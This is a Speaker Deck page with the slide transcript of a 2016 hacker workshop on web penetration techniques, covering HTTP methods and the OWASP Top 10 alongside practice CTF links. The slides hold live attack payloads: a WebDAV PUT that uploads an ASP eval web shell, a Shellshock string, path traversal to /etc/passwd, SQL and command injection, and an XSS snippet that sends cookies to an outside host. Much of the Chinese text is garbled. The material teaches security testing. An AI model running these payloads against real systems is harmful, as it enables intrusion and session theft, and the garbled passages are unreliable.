Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web滲透技巧(上)
Search
Lionbug
October 01, 2016
Research
1
400
Web滲透技巧(上)
The Declaration of Hacker (TDOH) WorkShop
Lionbug
October 01, 2016
Tweet
Share
More Decks by Lionbug
See All by Lionbug
Privacy and Security
lionbug
0
250
Web滲透技巧(下)
lionbug
0
740
Other Decks in Research
See All in Research
Community Driveプロジェクト(CDPJ)の中間報告
smartfukushilab1
0
170
都市交通マスタープランとその後への期待@熊本商工会議所・熊本経済同友会
trafficbrain
0
120
第二言語習得研究における 明示的・暗示的知識の再検討:この分類は何に役に立つか,何に役に立たないか
tam07pb915
0
1.2k
Earth AI: Unlocking Geospatial Insights with Foundation Models and Cross-Modal Reasoning
satai
3
480
svc-hook: hooking system calls on ARM64 by binary rewriting
retrage
1
100
その推薦システムの評価指標、ユーザーの感覚とズレてるかも
kuri8ive
1
320
LiDARセキュリティ最前線(2025年)
kentaroy47
0
130
情報技術の社会実装に向けた応用と課題:ニュースメディアの事例から / appmech-jsce 2025
upura
0
310
世界モデルにおける分布外データ対応の方法論
koukyo1994
7
1.5k
離散凸解析に基づく予測付き離散最適化手法 (IBIS '25)
taihei_oki
PRO
1
690
生成AI による論文執筆サポート・ワークショップ ─ サーベイ/リサーチクエスチョン編 / Workshop on AI-Assisted Paper Writing Support: Survey/Research Question Edition
ks91
PRO
0
140
ドメイン知識がない領域での自然言語処理の始め方
hargon24
1
240
Featured
See All Featured
Sam Torres - BigQuery for SEOs
techseoconnect
PRO
0
190
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
234
17k
Embracing the Ebb and Flow
colly
88
5k
Scaling GitHub
holman
464
140k
Producing Creativity
orderedlist
PRO
348
40k
Ethics towards AI in product and experience design
skipperchong
2
200
Making the Leap to Tech Lead
cromwellryan
135
9.7k
Odyssey Design
rkendrick25
PRO
1
500
Impact Scores and Hybrid Strategies: The future of link building
tamaranovitovic
0
200
From Legacy to Launchpad: Building Startup-Ready Communities
dugsong
0
140
Crafting Experiences
bethany
1
50
Google's AI Overviews - The New Search
badams
0
910
Transcript
Web佒蝚ದૣ(Ӥ) 2016/10/01 @ TDOH WorkShop LionBug
About Me • 讙紣Ռ̴a.k.a̴LionBug • 褾ੜ of TDOH • Co-founder
of UCCU • Know a little • Web Security
HTTP Hypertext Transfer Protocol
HTTPS Hypertext Transfer Protocol Secure
螀֢ܻቘ
Request & Response
HTTP Request GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0 (Windows
NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
Netcat or Telnet
Burp Suite
HTTP Request
HTTP GET Request GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
HTTP POST Request POST /login.php HTTP/1.1 … Content-Type: application/x-www-form-urlencoded Content-Length:
29 <Enter> username=admin&password=admin
HTTP Method • GET • POST • HEAD • OPTIONS
PUT DELETE TRACE MOVE…
HTTP OPTIONS Request OPTIONS / HTTP/1.1 HOST: lionbug.tw
HTTP OPTIONS Request SUCCESS HTTP/1.1 200 OK Allow: OPTIONS, TRACE,
GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET
HTTP OPTIONS Request Failed HTTP/1.1 200 OK Date: Thu, 29
Sep 2016 07:43:10 GMT Server: Apache
HTTP PUT Request PUT /shell.asp HTTP/1.1 HOST: lionbug.tw Content-Length: 26
<%eval(request(“cmd”))%>
HTTP PUT Request SUCCESS HTTP/1.1 201 Created Server: Microsoft-IIS/6.0 X-Powered-By:
ASP.NET Location: http://lionbug.tw/shell.asp
HTTP PUT Request Failed HTTP/1.1 404 Not Found
HTTP MOVE Request MOVE /shell.txt HTTP/1.1 HOST: lionbug.tw Destination: http://lionbug.tw/shell.asp
HTTP MOVE Request SUCCESS HTTP/1.1 201 Created Server: Microsoft-IIS/6.0 X-Powered-By:
ASP.NET Location: http://lionbug.tw/shell.asp
HTTP MOVE Request Failed HTTP/1.1 401 Unauthorized
WebDAV • MOVE shell.asp;.jpg • COPY shell.asp%00.jpg • NTFS稗褖 •
Ӿࢵኪמ礓羬ᕹWebDav笙၏膌 getshell
HTTP TRACE Request TRACE /hello HTTP/1.1 HOST: lionbug.tw Lion: bug
HTTP TRACE Request SUCCESS HTTP/1.1 200 OK … TRACE /hello
HTTP/1.1 HOST: lionbug.tw Lion: bug
XST Cross-Site Tracing
HTTP TRACE Request TRACE /<script>alert(1);<script> HTTP/1.1 HOST: lionbug.tw
HTTP TRACE Request SUCCESS HTTP/1.1 200 OK … TRACE /<script>alert(1);<script>
HTTP/1.1 HOST: lionbug.tw
HTTP TRACE Request • XST • Bypass httpOnly?
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass01/
HTTP Request URI GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
HTTP Request URI • /index.php • /upload/ • /blog/1 •
/index.php/blog/1 • ../../../../../etc/passwd
Django Directory Traversal
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass02/
HTTP Request Version GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
HTTP Request Version • ଉ憎粚 • 1.0 • 1.1 •
Host • Connection: Keep-Alive • 2.0 • HTTP2.0ܐᦓᤩ฿4ӻṛܧ笙၏牧 ݢ膌๐ۓ瑊ૄმ(Freebuf)
HTTP Request Header GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
Requests HOST • Host: lionbug.tw • HTTP 1.1 • VirtualHost
• …
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass03/
Requests User-Agent • User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0;
rv:11.0) • 战ग़翕ᒊ螡䢔珊匍獉 • Shellshock (bash CVE-2014-6271) • () { :; }; ping -c 5 lionbug.tw • …
Requests Referer • Referer: http://lionbug.tw/index.php • …
Requests Accept 疑碢 • Accept: text/html; • Accept-Language: zh-TW,zh; •
Accept-Encoding: gzip, deflate • Accept-Ranges: bytes=0-1 • …
Requests Accept-Language • Accept-Language: zh-TW,zh; • …
Requests Accept-Ranges • Accept-Ranges: bytes=0-500 • Accept-Ranges: bytes=0-500,50-100 • CVE-2011-3192,
CVE-2015-1635(MS15-034) • …
Requests Cookie • Cookie: PHPSESSID=sess_3dd484f2bab6a2d 2509e9850dae3b897; • …
Requests X-Forwarded-For • X-Forwarded-For: 127.0.0.1 • …
HTTP Response
HTTP Status Code HTTP/1.1 200 OK Date: Wed, 25 May
2016 11:48:22 GMT Server: Apache Content-Length: 72 Connection: close Content-Type: text/html
HTTP Status Code • 1xx ૪ᤩ矑ݑ牧襑ᥝ媣媲蒂ቘ • 2xx ૪౮ۑᤩ֑๐瑊矑硩牏ቘ薹牏㪔矑ݑ •
3xx 制眲嘨አ㬵᯿碝疩ݻ牧盅媲ጱ藶穩֖࣎ • 4xx դ蔭ԧአ䜛ᒒ፡蚏㬵ݢ胼咳ኞԧ梊藮牧ঘ繸 ԧ֑๐瑊ጱ蒂ቘ • 5xx ֑๐瑊ࣁ蒂ቘ藶穩ጱ螂纷Ӿ磪梊藮ᘏ吖ଉ 制眲咳ኞ
HTTP Status Code • 200 OK • 3xx • 301
Moved Permanently • 302 Found • 4xx • 401 Unauthorized • 403 Forbidden • 500 Internal Server Error
HTTP Response Header HTTP/1.1 200 OK Date: Wed, 25 May
2016 11:48:22 GMT Server: Apache Content-Length: 72 Connection: close Content-Type: text/html
Response Server • Server: Apache/2.4.7 (Ubuntu) • Server: Microsoft-IIS/7.5 •
…
Response X-Powered-By • X-Powered-By: Flask/0.7.2 • X-Powered-By: ASP.NET • X-Powered-By:
PHP/5.5.9-1ubuntu4.19 • …
HTTP Response Content HTTP/1.1 200 OK … <html> </html>
Try to find http://ctf.mis.nkfust.edu.tw/bypass05/
OWASP TOP 10 2013 ᤩ拻粋ጱ聲
๚涢挨ጱ疩ݻ • A10 - Unvalidated Redirects and Forwards • https://google.com/?redirect=http://lionbug.tw/
• https://google.com/?redirect=http%3A%2f %2flionbug.tw%2f
Unvalidated Redirects and Forwards https://bounty.github.com/classifications/ unvalidated-redirect-or-forward.html
ֵአ૪Ꭳ笙၏زկ • A9 - Using Components with Known Vulnerabilities •
ଉ憎笙၏ॺկ • FCKeditor, CKeditor • WordPress or Plugin • WPScan
ᒊٛݷ藶穩 • A8 – Cross Site Request Forgery (CSRF) •
藶穩ےӤtoken • 蝐抓牫᯿ᗝੂ嘨牫 • <img src=“http://lionbug.tw/newpass?pass=123”>
耬ۑ胼羷獨ጱਂ玲矒ګ • A7 – Missing Function Level Access Control •
/admin/upload.php • .git .svn • index.php~ • robots.txt
robots.txt # robots.txt to deny the robots access User-agent: *
Disallow: /admin Disallow: /admin.ex Disallow: /config
robots.txt • fb.me/robots.txt • www.dcard.tw/robots.txt • tw.yahoo.com/robots.txt
硵眤虻碘ู襷 • A6 – Sensitive Data Exposure • ੂ嘨 •
MD5牏SHA1牏DES • ก嘨㯽蜍
ੂ嘨ਂࣁCookieӾ
LinkedIn 癱ੂ丽笙 http://thehackernews.com/2016/05/linkedin-account- hack.html
dadada http://www.nydailynews.com/news/national/mark-zuckerberg- twitter-account-hacked-password-dadada-article-1.2662351
౯ጱੂ嘨䷱磪ےੂ 褾仡
EC-Council
EC-Council ?????????
犋吚ጱਞ獊奲眲戔ਧ • A5 – Security Misconfiguration • ୧ੂ嘨? admin? root?
1234? • port • 3306 mysql • 6379 redis • 8081 tomcat • …
犋ਞ獊ጱᇔկ㷢ᘍ • A4 – Insecure Direct Object References • ଘᤈ稗褖
• /?stuid=u9823001 • /cgpwd.php?username=admin&pass=1234 • /delete.php?id=123
ଘᤈ稗褖笙၏ A ݶ䋊 B ݶ䋊 C ݶ䋊 D ݶ䋊 Admin
Facebook Fixes Vulnerability That Led to Account Takeover, Pays Researcher
$16K https://threatpost.com/facebook-fixes-vulnerability-that- led-to-account-takeover-pays-researcher-16k/120688/
Security Researcher Discovers Bug That Would Let Hackers Delete Any
Photo Off Facebook https://techcrunch.com/2013/09/02/security-researcher-discovers- bug-that-would-let-hackers-delete-any-photo-off-facebook/
OpenFind Mail2000 犨᯿ᗝੂ嘨
狕硬㮆Ո虻碘 襑ᥝ戔ਧᒫԫמᓟ胼硩᯿ᗝמ
modify_id ??
౮ۑ᯿ᗝadminੂ嘨 https://zeroday.hitcon.org/vulnerability/ ZD-2016-00031
犋吚ጱਞ獊奲眲戔ਧ • Directory Traversal • /download.php?file=123.pdf • /download.php?file=../../../../../etc/passwd • Local
File Inclusion • /index.php?mod=news • <?php include($_GET[‘mod’].’php’); ?>
犋吚ጱਞ獊奲眲戔ਧ • Remote File Inclusion • /index.php?mod=http://lionbug.tw/shell.php allow_url_fopen=On
WhatsApp LFI http://thehackernews.com/2013/06/Hacking- whatsapp-android-application.html
ᒊ脻纷ୗ硭䢗 • A3 – Cross-Site Scripting(XSS) • 硭䢗ਮ䜛ᒒ牫 • ࣁ獮ᒒ矠獈䘣դ嘨
•HTML牏CSS牏Javascript牏Flash …
ᒊ脻纷ୗ硭䢗 • 玱疤ࣳ • http://lionbug.tw/xss.php? msg=<script>alert(1);</script> • 㱪ਂࣳ • ᒍ獉
• …
碝窚盏玡Ӟ賳Flash XSSکXSS Worm https://www.leavesongs.com/HTML/sina-weibo- flashxss-worm.html
XSS 猂玲 Cookie
ᒊ脻纷ୗ硭䢗 <script> var img = new Image(); img.src = ‘http://lionbug.tw/’+document.cookie;
</script>
OpenFind Mail2000 Xss
• onclick 磦矦౮ xonclick • script 磦矦౮ scrips • html
݄ᴻ ?? OpenFind Mail2000
<html></html><<html></html>s<html></ html>c<html></html>r<html></html>i<html></ html>p<html></html>t<html></ html>><html></html>a<html></html>l<html></ html>e<html></html>r<html></html>t<html></ html>(<html></html>'<html></html>x<html></ html>s<html></html>s<html></html>'<html></ html>)<html></html>;<html></html><<html></ html>/<html></html>s<html></html>c<html></ html>r<html></html>i<html></html>p<html></
html>t<html></html>> XSS Payload
OpenFind Mail2000 XSS
BeEF 吚㮆ૡٍՈ
XSS 犖胼盅ݣ
Try to find http://ctf.mis.nkfust.edu.tw/bypass06
०硳ጱ涢挨膏蝫娄ᓕቘ • A2 – Broken Authentication and Session Management •
Session and Cookie • Cookie • admin=0; • user=21232f297a57a5a743894a0e4a801fc3; • HMAC ?? • …
襷ॠ笙၏ http://www.inside.com.tw/2015/08/21/ruten-security- issue
ဳ獈硭䢗 • A1 – Injection • ဳ獈圵觊 • SQL Injection
• Code Injection • Command Injection • LDAP Injection • …
SQL Injection Select username, password From Member Where username =
‘admin’ and password = ‘1234’
user.php?id=1 SELECT id, name, password From member Where id =
1 id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
user.php?id=1 or 1=1 SELECT id, name, password From member Where
id = 1 Or 1=1 id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
Login SELECT … Where name = ‘admin’ AND password =
‘asdxcx’ id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
Login SELECT … Where name = ‘admin’ or 1 =
1 -- ‘’ AND password = ‘’ id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
Code Injection • 纷ୗ嘨ဳ獈 • PHP • eval($_GET[‘code’]); • ASP
• <%eval request("code")%>
Uber Remote Code Execution http://blog.orange.tw/2016/04/bug-bounty-uber- ubercom-remote-code_7.html
Command Injection • 犤ဳ獈 • curl http://lionbug.tw • curl http://lionbug.tw;
ls -al
Google Command injection http://www.pranav-venkat.com/2016/03/command- injection-which-got-me-6000.html
伛猋ૡ֢ • 蘷獨承 礍 羬翄 (wappalyzer) • 矊ፓ袅 (dirb) •
㯏礚 • subDomainsBrute • … • …
ଉ憎笙၏ڥአ • 犨Ӥ㯽笙၏ • LFI • SQL injection • …
犨Ӥ㯽笙၏ • 涢挨ොୗ • JS • FileName • Content-Type •
Header
JS 獮ᒒ涢挨
犨Ӥ㯽笙၏ • FileName • 123.jpg • 123.php%00.jpg • 123.jpg.php •
123.php?.jpg
犨Ӥ㯽笙၏ • Content-Type • image/jpeg • image/png • Header •
??
PHP Bug?? http://ctf.mis.nkfust.edu.tw/bypass07
== TRUE FALSE 1 0 -1 "1" "0" "-1" NULL
array() "php" "" TRUE TRUE FALSE TRUE FALSE TRUE TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE TRUE TRUE FALSE TRUE 1 TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE TRUE FALSE TRUE TRUE -1 TRUE FALSE FALSE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE "1" TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE "0" FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE "-1" TRUE FALSE FALSE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE NULL FALSE TRUE FALSE TRUE FALSE FALSE FALSE FALSE TRUE TRUE FALSE TRUE array() FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE FALSE FALSE "php" TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE "" FALSE TRUE FALSE TRUE FALSE FALSE FALSE FALSE TRUE FALSE FALSE TRUE
Q & A
lionbug
smartfukushilab1
trafficbrain
tam07pb915
.png){kind=avatar}
satai
retrage
kuri8ive
kentaroy47
upura
koukyo1994
taihei_oki
ks91
hargon24
techseoconnect
marcelosomers
colly
holman
orderedlist
skipperchong
cromwellryan
rkendrick25
tamaranovitovic
dugsong
bethany
badams
![Code Injection • 纷ୗ嘨ဳ獈 • PHP • eval($_GET[‘code’]); • ASP](https://files.speakerdeck.com/presentations/aa203c1164af47a8979f917686136b9d/slide_102.jpg){kind=link}
